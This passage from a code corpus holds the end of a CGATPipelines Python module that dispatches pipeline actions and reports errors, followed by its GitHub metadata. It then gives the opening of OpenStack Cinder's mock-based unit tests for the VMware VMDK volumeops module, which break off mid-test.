options.pipeline_targets,
checksum_level=options.ruffus_checksums_level)
elif options.pipeline_action == "plot":
outf, filename = tempfile.mkstemp()
pipeline_printout_graph(
os.fdopen(outf, "wb"),
options.pipeline_format,
options.pipeline_targets,
checksum_level=options.ruffus_checksums_level)
execute("inkscape %s" % filename)
os.unlink(filename)
except ruffus_exceptions.RethrownJobError as value:
if not options.debug:
E.error("%i tasks with errors, please see summary below:" %
len(value.args))
for idx, e in enumerate(value.args):
task, job, error, msg, traceback = e
if task is None:
# this seems to be errors originating within ruffus
# such as a missing dependency
# msg then contains a RethrownJobJerror
msg = str(msg)
pass
else:
task = re.sub("__main__.", "", task)
job = re.sub("\s", "", job)
if messenger:
messenger.send_error(task, job, error, msg)
# display only single line messages
if len([x for x in msg.split("\n") if x != ""]) > 1:
msg = ""
E.error("%i: Task=%s Error=%s %s: %s" %
(idx, task, error, job, msg))
E.error("full traceback is in %s" % options.logfile)
# write full traceback to log file only by removing the stdout
# handler
lhStdout = logger.handlers[0]
logger.removeHandler(lhStdout)
logger.error("start of error messages")
logger.error(value)
logger.error("end of error messages")
logger.addHandler(lhStdout)
# raise error
raise ValueError(
"pipeline failed with %i errors" % len(value.args))
else:
raise
elif options.pipeline_action == "dump":
print(json.dumps(PARAMS))
elif options.pipeline_action == "printconfig":
print("Printing out pipeline parameters: ")
for k in sorted(PARAMS):
print(k, "=", PARAMS[k])
printConfigFiles()
elif options.pipeline_action == "config":
# (Antonio) I've modified this section, see explanation and changes in the
# writeConfigFiles function above.
f = sys._getframe(1)
caller = inspect.getargvalues(f).locals["__file__"]
# CGATPipelines have a pipe_XX/pipe_XX hierarchy, but a simplified
# version would only have pipe_XX/
# so creating an additional pipeline_path
# TO DO: clean this up
pipeline_path = os.path.splitext(caller)[0]
pipeline_path_2 = os.path.dirname(pipeline_path)
# CGATPipelines have a "configuration" folder
# adding a glob to have a bit more flexibility
general_path = glob.glob(str(os.path.abspath(pipeline_path_2) +
'/configuration*'))
if not general_path:
general_path = os.path.join(os.path.dirname(pipeline_path), "configuration")
else:
general_path = str(general_path[0])
writeConfigFiles(pipeline_path, pipeline_path_2, general_path)
elif options.pipeline_action == "clone":
clonePipeline(options.pipeline_targets[0])
else:
raise ValueError("unknown pipeline action %s" %
options.pipeline_action)
E.Stop()
| {
"content_hash": "b2ccbe4d65974627ab66155237df236e",
"timestamp": "",
"source": "github",
"line_count": 1165,
"max_line_length": 97,
"avg_line_length": 35.25150214592275,
"alnum_prop": 0.5563942729132171,
"repo_name": "AntonioJBT/CGATPipeline_core",
"id": "1d229b1473caa99d40f1b1010d40fbf378821a23",
"size": "41068",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "CGATPipelines/Pipeline/Control_old_backup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "7463"
},
{
"name": "JavaScript",
"bytes": "285056"
},
{
"name": "Python",
"bytes": "394936"
},
{
"name": "Shell",
"bytes": "37635"
}
],
"symlink_target": ""
} |
"""
Test suite for VMware VMDK driver volumeops module.
"""
import mock
from oslo_utils import units
from oslo_vmware import exceptions
from oslo_vmware import vim_util
from cinder import test
from cinder.volume.drivers.vmware import exceptions as vmdk_exceptions
from cinder.volume.drivers.vmware import volumeops
class VolumeOpsTestCase(test.TestCase):
"""Unit tests for volumeops module."""
MAX_OBJECTS = 100
def setUp(self):
super(VolumeOpsTestCase, self).setUp()
self.session = mock.MagicMock()
self.vops = volumeops.VMwareVolumeOps(self.session, self.MAX_OBJECTS)
def test_split_datastore_path(self):
test1 = '[datastore1] myfolder/mysubfolder/myvm.vmx'
(datastore, folder, file_name) = volumeops.split_datastore_path(test1)
self.assertEqual('datastore1', datastore)
self.assertEqual('myfolder/mysubfolder/', folder)
self.assertEqual('myvm.vmx', file_name)
test2 = '[datastore2 ] myfolder/myvm.vmdk'
(datastore, folder, file_name) = volumeops.split_datastore_path(test2)
self.assertEqual('datastore2', datastore)
self.assertEqual('myfolder/', folder)
self.assertEqual('myvm.vmdk', file_name)
test3 = 'myfolder/myvm.vmdk'
self.assertRaises(IndexError, volumeops.split_datastore_path, test3)
def vm(self, val):
"""Create a mock vm in retrieve result format."""
vm = mock.MagicMock()
prop = mock.Mock(spec=object)
prop.val = val
vm.propSet = [prop]
return vm
def test_get_backing(self):
name = 'mock-backing'
# Test no result
self.session.invoke_api.return_value = None
result = self.vops.get_backing(name)
self.assertIsNone(result)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_objects',
self.session.vim,
'VirtualMachine',
self.MAX_OBJECTS)
# Test single result
vm = self.vm(name)
vm.obj = mock.sentinel.vm_obj
retrieve_result = mock.Mock(spec=object)
retrieve_result.objects = [vm]
self.session.invoke_api.return_value = retrieve_result
self.vops.cancel_retrieval = mock.Mock(spec=object)
result = self.vops.get_backing(name)
self.assertEqual(mock.sentinel.vm_obj, result)
self.session.invoke_api.assert_called_with(vim_util, 'get_objects',
self.session.vim,
'VirtualMachine',
self.MAX_OBJECTS)
self.vops.cancel_retrieval.assert_called_once_with(retrieve_result)
# Test multiple results
retrieve_result2 = mock.Mock(spec=object)
retrieve_result2.objects = [vm('1'), vm('2'), vm('3')]
self.session.invoke_api.return_value = retrieve_result2
self.vops.continue_retrieval = mock.Mock(spec=object)
self.vops.continue_retrieval.return_value = retrieve_result
result = self.vops.get_backing(name)
self.assertEqual(mock.sentinel.vm_obj, result)
self.session.invoke_api.assert_called_with(vim_util, 'get_objects',
self.session.vim,
'VirtualMachine',
self.MAX_OBJECTS)
self.vops.continue_retrieval.assert_called_once_with(retrieve_result2)
self.vops.cancel_retrieval.assert_called_with(retrieve_result)
def test_delete_backing(self):
backing = mock.sentinel.backing
task = mock.sentinel.task
self.session.invoke_api.return_value = task
self.vops.delete_backing(backing)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"Destroy_Task",
backing)
self.session.wait_for_task(task)
def test_get_host(self):
instance = mock.sentinel.instance
host = mock.sentinel.host
self.session.invoke_api.return_value = host
result = self.vops.get_host(instance)
self.assertEqual(host, result)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
instance,
'runtime.host')
def test_get_hosts(self):
hosts = mock.sentinel.hosts
self.session.invoke_api.return_value = hosts
result = self.vops.get_hosts()
self.assertEqual(hosts, result)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_objects',
self.session.vim,
'HostSystem',
self.MAX_OBJECTS)
def test_continue_retrieval(self):
retrieve_result = mock.sentinel.retrieve_result
self.session.invoke_api.return_value = retrieve_result
result = self.vops.continue_retrieval(retrieve_result)
self.assertEqual(retrieve_result, result)
self.session.invoke_api.assert_called_once_with(vim_util,
'continue_retrieval',
self.session.vim,
retrieve_result)
def test_cancel_retrieval(self):
retrieve_result = mock.sentinel.retrieve_result
self.session.invoke_api.return_value = retrieve_result
result = self.vops.cancel_retrieval(retrieve_result)
self.assertIsNone(result)
self.session.invoke_api.assert_called_once_with(vim_util,
'cancel_retrieval',
self.session.vim,
retrieve_result)
def test_is_usable(self):
mount_info = mock.Mock(spec=object)
mount_info.accessMode = "readWrite"
mount_info.mounted = True
mount_info.accessible = True
self.assertTrue(self.vops._is_usable(mount_info))
del mount_info.mounted
self.assertTrue(self.vops._is_usable(mount_info))
mount_info.accessMode = "readonly"
self.assertFalse(self.vops._is_usable(mount_info))
mount_info.accessMode = "readWrite"
mount_info.mounted = False
self.assertFalse(self.vops._is_usable(mount_info))
mount_info.mounted = True
mount_info.accessible = False
self.assertFalse(self.vops._is_usable(mount_info))
del mount_info.accessible
self.assertFalse(self.vops._is_usable(mount_info))
def _create_host_mounts(self, access_mode, host, set_accessible=True,
is_accessible=True, mounted=True):
"""Create host mount value of datastore with single mount info.
:param access_mode: string specifying the read/write permission
:param set_accessible: specify whether accessible property
should be set
:param is_accessible: boolean specifying whether the datastore
is accessible to host
:param host: managed object reference of the connected
host
:return: list of host mount info
"""
mntInfo = mock.Mock(spec=object)
mntInfo.accessMode = access_mode
if set_accessible:
mntInfo.accessible = is_accessible
else:
del mntInfo.accessible
mntInfo.mounted = mounted
host_mount = mock.Mock(spec=object)
host_mount.key = host
host_mount.mountInfo = mntInfo
host_mounts = mock.Mock(spec=object)
host_mounts.DatastoreHostMount = [host_mount]
return host_mounts
def test_get_connected_hosts(self):
with mock.patch.object(self.vops, 'get_summary') as get_summary:
datastore = mock.sentinel.datastore
summary = mock.Mock(spec=object)
get_summary.return_value = summary
summary.accessible = False
hosts = self.vops.get_connected_hosts(datastore)
self.assertEqual([], hosts)
summary.accessible = True
host = mock.Mock(spec=object)
host.value = mock.sentinel.host
host_mounts = self._create_host_mounts("readWrite", host)
self.session.invoke_api.return_value = host_mounts
hosts = self.vops.get_connected_hosts(datastore)
self.assertEqual([mock.sentinel.host], hosts)
self.session.invoke_api.assert_called_once_with(
vim_util,
'get_object_property',
self.session.vim,
datastore,
'host')
del host_mounts.DatastoreHostMount
hosts = self.vops.get_connected_hosts(datastore)
self.assertEqual([], hosts)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'get_connected_hosts')
def test_is_datastore_accessible(self, get_connected_hosts):
host_1 = mock.sentinel.host_1
host_2 = mock.sentinel.host_2
get_connected_hosts.return_value = [host_1, host_2]
ds = mock.sentinel.datastore
host = mock.Mock(value=mock.sentinel.host_1)
self.assertTrue(self.vops.is_datastore_accessible(ds, host))
get_connected_hosts.assert_called_once_with(ds)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'get_connected_hosts')
def test_is_datastore_accessible_with_inaccessible(self,
get_connected_hosts):
host_1 = mock.sentinel.host_1
get_connected_hosts.return_value = [host_1]
ds = mock.sentinel.datastore
host = mock.Mock(value=mock.sentinel.host_2)
self.assertFalse(self.vops.is_datastore_accessible(ds, host))
get_connected_hosts.assert_called_once_with(ds)
def test_is_valid(self):
with mock.patch.object(self.vops, 'get_summary') as get_summary:
summary = mock.Mock(spec=object)
get_summary.return_value = summary
datastore = mock.sentinel.datastore
host = mock.Mock(spec=object)
host.value = mock.sentinel.host
def _is_valid(host_mounts, is_valid):
self.session.invoke_api.return_value = host_mounts
result = self.vops._is_valid(datastore, host)
self.assertEqual(is_valid, result)
self.session.invoke_api.assert_called_with(
vim_util,
'get_object_property',
self.session.vim,
datastore,
'host')
# Test positive cases
summary.maintenanceMode = 'normal'
summary.accessible = True
_is_valid(self._create_host_mounts("readWrite", host), True)
# Test negative cases
_is_valid(self._create_host_mounts("Inaccessible", host), False)
_is_valid(self._create_host_mounts("readWrite", host, True, False),
False)
_is_valid(self._create_host_mounts("readWrite", host, True, True,
False), False)
summary.accessible = False
_is_valid(self._create_host_mounts("readWrite", host, False),
False)
summary.accessible = True
summary.maintenanceMode = 'inMaintenance'
_is_valid(self._create_host_mounts("readWrite", host), False)
def test_get_dss_rp(self):
with mock.patch.object(self.vops, 'get_summary') as get_summary:
summary = mock.Mock(spec=object)
summary.accessible = True
summary.maintenanceModel = 'normal'
get_summary.return_value = summary
# build out props to be returned by 1st invoke_api call
datastore_prop = mock.Mock(spec=object)
datastore_prop.name = 'datastore'
datastore_prop.val = mock.Mock(spec=object)
datastore_prop.val.ManagedObjectReference = [mock.sentinel.ds1,
mock.sentinel.ds2]
compute_resource_prop = mock.Mock(spec=object)
compute_resource_prop.name = 'parent'
compute_resource_prop.val = mock.sentinel.compute_resource
elem = mock.Mock(spec=object)
elem.propSet = [datastore_prop, compute_resource_prop]
props = [elem]
# build out host_mounts to be returned by 2nd invoke_api call
host = mock.Mock(spec=object)
host.value = mock.sentinel.host
host_mounts = self._create_host_mounts("readWrite", host)
# build out resource_pool to be returned by 3rd invoke_api call
resource_pool = mock.sentinel.resource_pool
# set return values for each call of invoke_api
self.session.invoke_api.side_effect = [props,
host_mounts,
host_mounts,
resource_pool]
# invoke function and verify results
(dss_actual, rp_actual) = self.vops.get_dss_rp(host)
self.assertEqual([mock.sentinel.ds1, mock.sentinel.ds2],
dss_actual)
self.assertEqual(resource_pool, rp_actual)
# invoke function with no valid datastore
summary.maintenanceMode = 'inMaintenance'
self.session.invoke_api.side_effect = [props,
host_mounts,
host_mounts,
resource_pool]
self.assertRaises(exceptions.VimException,
self.vops.get_dss_rp,
host)
# Clear side effects.
self.session.invoke_api.side_effect = None
def test_get_parent(self):
# Not recursive
child = mock.Mock(spec=object)
child._type = 'Parent'
ret = self.vops._get_parent(child, 'Parent')
self.assertEqual(child, ret)
# Recursive
parent = mock.Mock(spec=object)
parent._type = 'Parent'
child = mock.Mock(spec=object)
child._type = 'Child'
self.session.invoke_api.return_value = parent
ret = self.vops._get_parent(child, 'Parent')
self.assertEqual(parent, ret)
self.session.invoke_api.assert_called_with(vim_util,
'get_object_property',
self.session.vim, child,
'parent')
def test_get_dc(self):
# set up hierarchy of objects
dc = mock.Mock(spec=object)
dc._type = 'Datacenter'
o1 = mock.Mock(spec=object)
o1._type = 'mockType1'
o1.parent = dc
o2 = mock.Mock(spec=object)
o2._type = 'mockType2'
o2.parent = o1
# mock out invoke_api behaviour to fetch parent
def mock_invoke_api(vim_util, method, vim, the_object, arg):
return the_object.parent
self.session.invoke_api.side_effect = mock_invoke_api
ret = self.vops.get_dc(o2)
self.assertEqual(dc, ret)
# Clear side effects.
self.session.invoke_api.side_effect = None
def test_get_vmfolder(self):
self.session.invoke_api.return_value = mock.sentinel.ret
ret = self.vops.get_vmfolder(mock.sentinel.dc)
self.assertEqual(mock.sentinel.ret, ret)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
mock.sentinel.dc,
'vmFolder')
def test_create_folder_with_concurrent_create(self):
parent_folder = mock.sentinel.parent_folder
child_name = 'child_folder'
prop_val_1 = mock.Mock(ManagedObjectReference=[])
child_folder = mock.Mock(_type='Folder')
prop_val_2 = mock.Mock(ManagedObjectReference=[child_folder])
self.session.invoke_api.side_effect = [prop_val_1,
exceptions.DuplicateName,
prop_val_2,
child_name]
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_folder, ret)
expected_invoke_api = [mock.call(vim_util, 'get_object_property',
self.session.vim, parent_folder,
'childEntity'),
mock.call(self.session.vim, 'CreateFolder',
parent_folder, name=child_name),
mock.call(vim_util, 'get_object_property',
self.session.vim, parent_folder,
'childEntity'),
mock.call(vim_util, 'get_object_property',
self.session.vim, child_folder,
'name')]
self.assertEqual(expected_invoke_api,
self.session.invoke_api.mock_calls)
def test_create_folder_with_empty_vmfolder(self):
"""Test create_folder when the datacenter vmFolder is empty"""
child_folder = mock.sentinel.child_folder
self.session.invoke_api.side_effect = [None, child_folder]
parent_folder = mock.sentinel.parent_folder
child_name = 'child_folder'
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_folder, ret)
expected_calls = [mock.call(vim_util, 'get_object_property',
self.session.vim, parent_folder,
'childEntity'),
mock.call(self.session.vim, 'CreateFolder',
parent_folder, name=child_name)]
self.assertEqual(expected_calls,
self.session.invoke_api.call_args_list)
def test_create_folder_not_present(self):
"""Test create_folder when child not present."""
parent_folder = mock.sentinel.parent_folder
child_name = 'child_folder'
prop_val = mock.Mock(spec=object)
prop_val.ManagedObjectReference = []
child_folder = mock.sentinel.child_folder
self.session.invoke_api.side_effect = [prop_val, child_folder]
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_folder, ret)
expected_invoke_api = [mock.call(vim_util, 'get_object_property',
self.session.vim, parent_folder,
'childEntity'),
mock.call(self.session.vim, 'CreateFolder',
parent_folder, name=child_name)]
self.assertEqual(expected_invoke_api,
self.session.invoke_api.mock_calls)
# Clear side effects.
self.session.invoke_api.side_effect = None
def test_create_folder_already_present(self):
"""Test create_folder when child already present."""
parent_folder = mock.sentinel.parent_folder
child_name = 'child_folder'
prop_val = mock.Mock(spec=object)
child_entity_1 = mock.Mock(spec=object)
child_entity_1._type = 'Folder'
child_entity_1_name = 'SomeOtherName'
child_entity_2 = mock.Mock(spec=object)
child_entity_2._type = 'Folder'
child_entity_2_name = child_name
prop_val.ManagedObjectReference = [child_entity_1, child_entity_2]
self.session.invoke_api.side_effect = [prop_val, child_entity_1_name,
child_entity_2_name]
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_entity_2, ret)
expected_invoke_api = [mock.call(vim_util, 'get_object_property',
self.session.vim, parent_folder,
'childEntity'),
mock.call(vim_util, 'get_object_property',
self.session.vim, child_entity_1,
'name'),
mock.call(vim_util, 'get_object_property',
self.session.vim, child_entity_2,
'name')]
self.assertEqual(expected_invoke_api,
self.session.invoke_api.mock_calls)
# Clear side effects.
self.session.invoke_api.side_effect = None
def test_create_folder_with_special_characters(self):
"""Test create_folder with names containing special characters."""
# Test folder already exists case.
child_entity_1 = mock.Mock(_type='Folder')
child_entity_1_name = 'cinder-volumes'
child_entity_2 = mock.Mock(_type='Folder')
child_entity_2_name = '%2fcinder-volumes'
prop_val = mock.Mock(ManagedObjectReference=[child_entity_1,
child_entity_2])
self.session.invoke_api.side_effect = [prop_val,
child_entity_1_name,
child_entity_2_name]
parent_folder = mock.sentinel.parent_folder
child_name = '/cinder-volumes'
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_entity_2, ret)
# Test non-existing folder case.
child_entity_2_name = '%25%25cinder-volumes'
new_child_folder = mock.sentinel.new_child_folder
self.session.invoke_api.side_effect = [prop_val,
child_entity_1_name,
child_entity_2_name,
new_child_folder]
child_name = '%cinder-volumes'
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(new_child_folder, ret)
self.session.invoke_api.assert_called_with(self.session.vim,
'CreateFolder',
parent_folder,
name=child_name)
# Reset side effects.
self.session.invoke_api.side_effect = None
def test_create_disk_backing_thin(self):
backing = mock.Mock()
del backing.eagerlyScrub
cf = self.session.vim.client.factory
cf.create.return_value = backing
disk_type = 'thin'
ret = self.vops._create_disk_backing(disk_type, None)
self.assertEqual(backing, ret)
self.assertIsInstance(ret.thinProvisioned, bool)
self.assertTrue(ret.thinProvisioned)
self.assertEqual('', ret.fileName)
self.assertEqual('persistent', ret.diskMode)
def test_create_disk_backing_thick(self):
backing = mock.Mock()
del backing.eagerlyScrub
del backing.thinProvisioned
cf = self.session.vim.client.factory
cf.create.return_value = backing
disk_type = 'thick'
ret = self.vops._create_disk_backing(disk_type, None)
self.assertEqual(backing, ret)
self.assertEqual('', ret.fileName)
self.assertEqual('persistent', ret.diskMode)
def test_create_disk_backing_eager_zeroed_thick(self):
backing = mock.Mock()
del backing.thinProvisioned
cf = self.session.vim.client.factory
cf.create.return_value = backing
disk_type = 'eagerZeroedThick'
ret = self.vops._create_disk_backing(disk_type, None)
self.assertEqual(backing, ret)
self.assertIsInstance(ret.eagerlyScrub, bool)
self.assertTrue(ret.eagerlyScrub)
self.assertEqual('', ret.fileName)
self.assertEqual('persistent', ret.diskMode)
def test_create_virtual_disk_config_spec(self):
cf = self.session.vim.client.factory
cf.create.side_effect = lambda *args: mock.Mock()
size_kb = units.Ki
controller_key = 200
disk_type = 'thick'
spec = self.vops._create_virtual_disk_config_spec(size_kb,
disk_type,
controller_key,
None)
cf.create.side_effect = None
self.assertEqual('add', spec.operation)
self.assertEqual('create', spec.fileOperation)
device = spec.device
self.assertEqual(size_kb, device.capacityInKB)
self.assertEqual(-101, device.key)
self.assertEqual(0, device.unitNumber)
self.assertEqual(controller_key, device.controllerKey)
backing = device.backing
self.assertEqual('', backing.fileName)
self.assertEqual('persistent', backing.diskMode)
def test_create_specs_for_ide_disk_add(self):
factory = self.session.vim.client.factory
factory.create.side_effect = lambda *args: mock.Mock()
size_kb = 1
disk_type = 'thin'
adapter_type = 'ide'
ret = self.vops._create_specs_for_disk_add(size_kb, disk_type,
adapter_type)
factory.create.side_effect = None
self.assertEqual(1, len(ret))
self.assertEqual(units.Ki, ret[0].device.capacityInKB)
self.assertEqual(200, ret[0].device.controllerKey)
expected = [mock.call.create('ns0:VirtualDeviceConfigSpec'),
mock.call.create('ns0:VirtualDisk'),
mock.call.create('ns0:VirtualDiskFlatVer2BackingInfo')]
factory.create.assert_has_calls(expected, any_order=True)
def test_create_specs_for_scsi_disk_add(self):
factory = self.session.vim.client.factory
factory.create.side_effect = lambda *args: mock.Mock()
size_kb = 2 * units.Ki
disk_type = 'thin'
adapter_type = 'lsiLogicsas'
ret = self.vops._create_specs_for_disk_add(size_kb, disk_type,
adapter_type)
factory.create.side_effect = None
self.assertEqual(2, len(ret))
self.assertEqual('noSharing', ret[1].device.sharedBus)
self.assertEqual(size_kb, ret[0].device.capacityInKB)
expected = [mock.call.create('ns0:VirtualLsiLogicSASController'),
mock.call.create('ns0:VirtualDeviceConfigSpec'),
mock.call.create('ns0:VirtualDisk'),
mock.call.create('ns0:VirtualDiskFlatVer2BackingInfo'),
mock.call.create('ns0:VirtualDeviceConfigSpec')]
factory.create.assert_has_calls(expected, any_order=True)
def test_get_create_spec_disk_less(self):
factory = self.session.vim.client.factory
factory.create.side_effect = lambda *args: mock.Mock()
name = mock.sentinel.name
ds_name = mock.sentinel.ds_name
profile_id = mock.sentinel.profile_id
option_key = mock.sentinel.key
option_value = mock.sentinel.value
extra_config = {option_key: option_value}
ret = self.vops._get_create_spec_disk_less(name, ds_name, profile_id,
extra_config)
factory.create.side_effect = None
self.assertEqual(name, ret.name)
self.assertEqual('[%s]' % ds_name, ret.files.vmPathName)
self.assertEqual("vmx-08", ret.version)
self.assertEqual(profile_id, ret.vmProfile[0].profileId)
self.assertEqual(1, len(ret.extraConfig))
self.assertEqual(option_key, ret.extraConfig[0].key)
self.assertEqual(option_value, ret.extraConfig[0].value)
expected = [mock.call.create('ns0:VirtualMachineFileInfo'),
mock.call.create('ns0:VirtualMachineConfigSpec'),
mock.call.create('ns0:VirtualMachineDefinedProfileSpec'),
mock.call.create('ns0:OptionValue')]
factory.create.assert_has_calls(expected, any_order=True)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_create_spec_disk_less')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_create_specs_for_disk_add')
def test_get_create_spec(self, create_specs_for_disk_add,
get_create_spec_disk_less):
name = 'vol-1'
size_kb = 1024
disk_type = 'thin'
ds_name = 'nfs-1'
profileId = mock.sentinel.profile_id
adapter_type = 'busLogic'
extra_config = mock.sentinel.extra_config
self.vops.get_create_spec(name, size_kb, disk_type, ds_name,
profileId, adapter_type, extra_config)
get_create_spec_disk_less.assert_called_once_with(
name, ds_name, profileId=profileId, extra_config=extra_config)
create_specs_for_disk_add.assert_called_once_with(
size_kb, disk_type, adapter_type)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'get_create_spec')
def test_create_backing(self, get_create_spec):
create_spec = mock.sentinel.create_spec
get_create_spec.return_value = create_spec
task = mock.sentinel.task
self.session.invoke_api.return_value = task
task_info = mock.Mock(spec=object)
task_info.result = mock.sentinel.result
self.session.wait_for_task.return_value = task_info
name = 'backing_name'
size_kb = mock.sentinel.size_kb
disk_type = mock.sentinel.disk_type
adapter_type = mock.sentinel.adapter_type
folder = mock.sentinel.folder
resource_pool = mock.sentinel.resource_pool
host = mock.sentinel.host
ds_name = mock.sentinel.ds_name
profile_id = mock.sentinel.profile_id
extra_config = mock.sentinel.extra_config
ret = self.vops.create_backing(name, size_kb, disk_type, folder,
resource_pool, host, ds_name,
profile_id, adapter_type, extra_config)
self.assertEqual(mock.sentinel.result, ret)
get_create_spec.assert_called_once_with(
name, size_kb, disk_type, ds_name, profileId=profile_id,
adapter_type=adapter_type, extra_config=extra_config)
self.session.invoke_api.assert_called_once_with(self.session.vim,
'CreateVM_Task',
folder,
config=create_spec,
pool=resource_pool,
host=host)
self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_create_spec_disk_less')
def test_create_backing_disk_less(self, get_create_spec_disk_less):
create_spec = mock.sentinel.create_spec
get_create_spec_disk_less.return_value = create_spec
task = mock.sentinel.task
self.session.invoke_api.return_value = task
task_info = mock.Mock(spec=object)
task_info.result = mock.sentinel.result
self.session.wait_for_task.return_value = task_info
name = 'backing_name'
folder = mock.sentinel.folder
resource_pool = mock.sentinel.resource_pool
host = mock.sentinel.host
ds_name = mock.sentinel.ds_name
profile_id = mock.sentinel.profile_id
extra_config = mock.sentinel.extra_config
ret = self.vops.create_backing_disk_less(name, folder, resource_pool,
host, ds_name, profile_id,
extra_config)
self.assertEqual(mock.sentinel.result, ret)
get_create_spec_disk_less.assert_called_once_with(
name, ds_name, profileId=profile_id, extra_config=extra_config)
self.session.invoke_api.assert_called_once_with(self.session.vim,
'CreateVM_Task',
folder,
config=create_spec,
pool=resource_pool,
host=host)
self.session.wait_for_task.assert_called_once_with(task)
def test_get_datastore(self):
backing = mock.sentinel.backing
datastore = mock.Mock(spec=object)
datastore.ManagedObjectReference = [mock.sentinel.ds]
self.session.invoke_api.return_value = datastore
ret = self.vops.get_datastore(backing)
self.assertEqual(mock.sentinel.ds, ret)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
backing, 'datastore')
def test_get_summary(self):
datastore = mock.sentinel.datastore
summary = mock.sentinel.summary
self.session.invoke_api.return_value = summary
ret = self.vops.get_summary(datastore)
self.assertEqual(summary, ret)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
datastore,
'summary')
def test_get_relocate_spec(self):
delete_disk_attribute = True
def _create_side_effect(type):
obj = mock.Mock()
if type == "ns0:VirtualDiskFlatVer2BackingInfo":
del obj.eagerlyScrub
elif (type == "ns0:VirtualMachineRelocateSpec" and
delete_disk_attribute):
del obj.disk
else:
pass
return obj
factory = self.session.vim.client.factory
factory.create.side_effect = _create_side_effect
datastore = mock.sentinel.datastore
resource_pool = mock.sentinel.resource_pool
host = mock.sentinel.host
disk_move_type = mock.sentinel.disk_move_type
ret = self.vops._get_relocate_spec(datastore, resource_pool, host,
disk_move_type)
self.assertEqual(datastore, ret.datastore)
self.assertEqual(resource_pool, ret.pool)
self.assertEqual(host, ret.host)
self.assertEqual(disk_move_type, ret.diskMoveType)
# Test with disk locator.
delete_disk_attribute = False
disk_type = 'thin'
disk_device = mock.Mock()
ret = self.vops._get_relocate_spec(datastore, resource_pool, host,
disk_move_type, disk_type,
disk_device)
factory.create.side_effect = None
self.assertEqual(datastore, ret.datastore)
self.assertEqual(resource_pool, ret.pool)
self.assertEqual(host, ret.host)
self.assertEqual(disk_move_type, ret.diskMoveType)
self.assertIsInstance(ret.disk, list)
self.assertEqual(1, len(ret.disk))
disk_locator = ret.disk[0]
self.assertEqual(datastore, disk_locator.datastore)
self.assertEqual(disk_device.key, disk_locator.diskId)
backing = disk_locator.diskBackingInfo
self.assertIsInstance(backing.thinProvisioned, bool)
self.assertTrue(backing.thinProvisioned)
self.assertEqual('', backing.fileName)
self.assertEqual('persistent', backing.diskMode)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_disk_device')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_relocate_spec')
def test_relocate_backing(self, get_relocate_spec, get_disk_device):
disk_device = mock.sentinel.disk_device
get_disk_device.return_value = disk_device
spec = mock.sentinel.relocate_spec
get_relocate_spec.return_value = spec
task = mock.sentinel.task
self.session.invoke_api.return_value = task
backing = mock.sentinel.backing
datastore = mock.sentinel.datastore
resource_pool = mock.sentinel.resource_pool
host = mock.sentinel.host
disk_type = mock.sentinel.disk_type
self.vops.relocate_backing(backing, datastore, resource_pool, host,
disk_type)
# Verify calls
disk_move_type = 'moveAllDiskBackingsAndAllowSharing'
get_disk_device.assert_called_once_with(backing)
get_relocate_spec.assert_called_once_with(datastore, resource_pool,
host, disk_move_type,
disk_type, disk_device)
self.session.invoke_api.assert_called_once_with(self.session.vim,
'RelocateVM_Task',
backing,
spec=spec)
self.session.wait_for_task.assert_called_once_with(task)
def test_move_backing_to_folder(self):
task = mock.sentinel.task
self.session.invoke_api.return_value = task
backing = mock.sentinel.backing
folder = mock.sentinel.folder
self.vops.move_backing_to_folder(backing, folder)
# Verify calls
self.session.invoke_api.assert_called_once_with(self.session.vim,
'MoveIntoFolder_Task',
folder,
list=[backing])
self.session.wait_for_task.assert_called_once_with(task)
def test_create_snapshot_operation(self):
task = mock.sentinel.task
self.session.invoke_api.return_value = task
task_info = mock.Mock(spec=object)
task_info.result = mock.sentinel.result
self.session.wait_for_task.return_value = task_info
backing = mock.sentinel.backing
name = mock.sentinel.name
desc = mock.sentinel.description
quiesce = True
ret = self.vops.create_snapshot(backing, name, desc, quiesce)
self.assertEqual(mock.sentinel.result, ret)
self.session.invoke_api.assert_called_once_with(self.session.vim,
'CreateSnapshot_Task',
backing, name=name,
description=desc,
memory=False,
quiesce=quiesce)
self.session.wait_for_task.assert_called_once_with(task)
def test_get_snapshot_from_tree(self):
volops = volumeops.VMwareVolumeOps
name = mock.sentinel.name
# Test snapshot == 'None'
ret = volops._get_snapshot_from_tree(name, None)
self.assertIsNone(ret)
# Test root == snapshot
snapshot = mock.sentinel.snapshot
node = mock.Mock(spec=object)
node.name = name
node.snapshot = snapshot
ret = volops._get_snapshot_from_tree(name, node)
self.assertEqual(snapshot, ret)
# Test root.childSnapshotList == None
root = mock.Mock(spec=object)
root.name = 'root'
del root.childSnapshotList
ret = volops._get_snapshot_from_tree(name, root)
self.assertIsNone(ret)
# Test root.child == snapshot
root.childSnapshotList = [node]
ret = volops._get_snapshot_from_tree(name, root)
self.assertEqual(snapshot, ret)
def test_get_snapshot(self):
# build out the root snapshot tree
snapshot_name = mock.sentinel.snapshot_name
snapshot = mock.sentinel.snapshot
